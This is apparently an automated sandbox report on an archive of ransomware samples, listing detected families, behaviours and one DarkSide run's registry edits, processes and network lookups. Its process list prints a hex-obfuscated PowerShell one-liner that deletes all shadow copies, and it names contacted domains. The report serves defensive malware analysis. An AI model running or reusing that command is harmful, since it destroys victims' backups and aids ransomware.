Malware Analysis Report

2024-09-11 02:34

Sample ID 240728-t5tryssgmm
Target RS.7z
SHA256 c5741701b3866459dd1ffa2477cfd8776713612912693a5897f78aac795d23e9
Tags
darkside credential_access discovery execution ransomware spyware stealer upx dearcry persistence hive defense_evasion impact lockbit evasion blackmatter babuk hades cryptone packer avoslocker conti avaddon trojan pyinstaller 512478c08dada2af19e49808fbda5b0b $2a$10$kmb3nsvqxc.93gyncgky/uq9hyhivf0e3hcajfiifr8hf3fmnofgm 7258 $2a$10$dfjplrxudytff.kmytq1rogsxjtjee8emqt65ftxltpjtxpzrhsaq 7178 medusalocker mespinoza sodinokibi makop
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1 (Detonation Overview, Signatures)

Behavioral analyses, in report order, each with the subsections Detonation Overview, Command Line, Signatures, Processes, Network, Files:

Analysis: behavioral18, behavioral24, behavioral27, behavioral30, behavioral17, behavioral11, behavioral8, behavioral12, behavioral25, behavioral26, behavioral3, behavioral7, behavioral16, behavioral29, behavioral5, behavioral19, behavioral13, behavioral23, behavioral2, behavioral10, behavioral20, behavioral21, behavioral1, behavioral4, behavioral6, behavioral9, behavioral14, behavioral15, behavioral22, behavioral28, behavioral32, behavioral31

Analysis Overview

score
10/10

SHA256

c5741701b3866459dd1ffa2477cfd8776713612912693a5897f78aac795d23e9

Threat Level: Known bad

The file RS.7z was found to be: Known bad.

Malicious Activity Summary


Blackmatter family

Mespinoza family

Makop

Hades payload

UAC bypass

DarkSide

DearCry

Babuk Locker

Detects Go variant of Hive Ransomware

Hades Ransomware

BlackMatter Ransomware

MedusaLocker payload

Avoslocker Ransomware

Medusalocker family

Lockbit

Avaddon

Sodinokibi family

Hive

Conti Ransomware

Renames multiple (3370) files with added filename extension

Deletes shadow copies

Renames multiple (260) files with added filename extension

Renames multiple (279) files with added filename extension

Renames multiple (478) files with added filename extension

Renames multiple (127) files with added filename extension

Modifies boot configuration data using bcdedit

Renames multiple (143) files with added filename extension

Renames multiple (1641) files with added filename extension

Renames multiple (8323) files with added filename extension

Renames multiple (81) files with added filename extension

CryptOne packer

Renames multiple (8072) files with added filename extension

Renames multiple (182) files with added filename extension

Renames multiple (163) files with added filename extension

Renames multiple (151) files with added filename extension

Renames multiple (7396) files with added filename extension

Renames multiple (7374) files with added filename extension

Renames multiple (144) files with added filename extension

Renames multiple (169) files with added filename extension

Renames multiple (167) files with added filename extension

Renames multiple (171) files with added filename extension

Renames multiple (154) files with added filename extension

Renames multiple (9354) files with added filename extension

Credentials from Password Stores: Credentials from Web Browsers

Renames multiple (60) files with added filename extension

Renames multiple (152) files with added filename extension

Renames multiple (3442) files with added filename extension

Renames multiple (190) files with added filename extension

Deletes backup catalog

Boot or Logon Autostart Execution: Active Setup

Drops file in Drivers directory

Loads dropped DLL

Drops startup file

Checks computer location settings

Deletes itself

Boot or Logon Autostart Execution: Print Processors

Executes dropped EXE

Credentials from Password Stores: Windows Credential Manager

Reads user/profile data of web browsers

UPX packed file

Looks up external IP address via web service

Command and Scripting Interpreter: PowerShell

Drops desktop.ini file(s)

Checks whether UAC is enabled

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Drops file in System32 directory

Suspicious use of SetThreadContext

Sets desktop wallpaper using registry

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Program Files directory

Drops file in Windows directory

Unsigned PE

Program crash

Enumerates physical storage devices

Detects Pyinstaller

System Network Configuration Discovery: Internet Connection Discovery

Browser Information Discovery

System Location Discovery: System Language Discovery

NSIS installer

Modifies system certificate store

Suspicious use of FindShellTrayWindow

Modifies registry class

Checks SCSI registry key(s)

Delays execution with timeout.exe

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Uses Volume Shadow Copy service COM API

Runs ping.exe

Modifies Control Panel

Suspicious behavior: EnumeratesProcesses

Views/modifies file attributes

Modifies Internet Explorer settings

System policy modification

Interacts with shadow copies

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious use of SendNotifyMessage

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-07-28 16:39

Signatures

Blackmatter family

blackmatter

MedusaLocker payload

Description Indicator Process Target
N/A N/A N/A N/A

Medusalocker family

medusalocker

Mespinoza family

mespinoza

Sodinokibi family

sodinokibi

CryptOne packer

cryptone packer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
(4 rows, all N/A)

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
(32 rows, all N/A)

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:42

Platform

win10v2004-20240709-en

Max time kernel

132s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe"

Signatures

DarkSide

ransomware darkside

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Renames multiple (151) files with added filename extension

ransomware

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
(7 rows, all N/A)

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\72c99bf6.BMP" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\72c99bf6.BMP" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.72c99bf6 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.72c99bf6\ = "72c99bf6" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\72c99bf6\DefaultIcon C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\72c99bf6 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\72c99bf6\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\72c99bf6.ico" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 catsdegree.com udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 13.248.169.48:443 catsdegree.com tcp
US 8.8.8.8:53 temisleyes.com udp
HK 154.219.131.251:443 temisleyes.com tcp
US 8.8.8.8:53 48.169.248.13.in-addr.arpa udp
US 8.8.8.8:53 22.249.124.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 1.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 26.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 48.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 53.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 51.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 41.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 40.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 22.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 30.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 20.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 30.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 22.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 51.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 48.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 53.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 40.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 20.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 41.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 26.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 10.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 21.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 25.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 42.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 44.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 45.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 23.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 47.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 50.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 58.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 62.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 8.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 14.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 63.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 66.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 10.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 42.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 23.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 50.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 58.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 45.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 47.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 44.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 21.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 62.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 25.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 14.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 8.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 66.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 63.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 57.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 56.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 61.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 55.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 36.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 43.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 35.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 34.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 33.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 31.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 29.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 46.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 24.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 18.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 16.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 17.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 15.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 9.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 32.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 7.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 2.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 3.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 6.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 0.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 4.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 88.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 86.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 85.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 77.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 78.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 76.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 70.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 74.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 71.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 69.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 67.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 68.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 64.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 84.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 82.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 57.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 61.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 55.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 33.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 36.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 29.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 16.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 9.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 32.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 31.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 3.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 35.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 6.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 4.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 7.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 15.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 24.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 17.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 46.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 18.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 82.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 0.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 43.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 34.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 59.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 60.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 54.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 49.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 39.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 28.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 5.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 12.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 13.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 11.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 27.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 38.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 19.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 37.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 65.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 73.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 72.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 79.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 75.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 83.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 80.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 87.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 89.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 81.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 90.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 70.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 67.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 84.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 69.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 68.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 76.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 74.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 77.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 88.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 86.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 71.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 78.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 64.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 85.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 49.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 60.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 54.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 13.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 28.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 39.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 11.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 19.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 5.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 37.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 27.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 59.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 38.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 65.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 12.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 73.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 79.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 72.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 80.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 83.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 87.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 81.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 90.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 75.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 192.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 191.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 189.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 183.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 153.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 145.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 139.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 167.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 191.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 189.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 183.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 139.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 153.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 167.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 145.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 129.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 254.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 131.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 133.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 130.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 134.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 135.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 137.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 136.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 138.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 140.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 142.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 141.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 143.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 144.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 147.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 148.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 149.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 150.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 151.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 146.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 154.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 155.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 152.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 157.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 156.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 159.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 158.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 161.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 160.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 162.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 163.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 164.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 165.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 168.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 169.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 170.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 171.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 172.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 174.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 173.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 175.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 176.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 178.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 179.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 180.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 181.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 182.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 177.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 184.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 185.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 187.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 194.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 188.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 186.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 190.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 248.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 192.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 193.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 132.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 197.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 198.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 203.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 210.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 215.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 216.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 217.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 223.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 225.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 226.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 227.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 231.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 233.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 234.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 236.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 242.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 244.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 245.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 246.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 251.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 252.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 133.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 130.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 138.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 137.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 136.0.127.10.in-addr.arpa udp
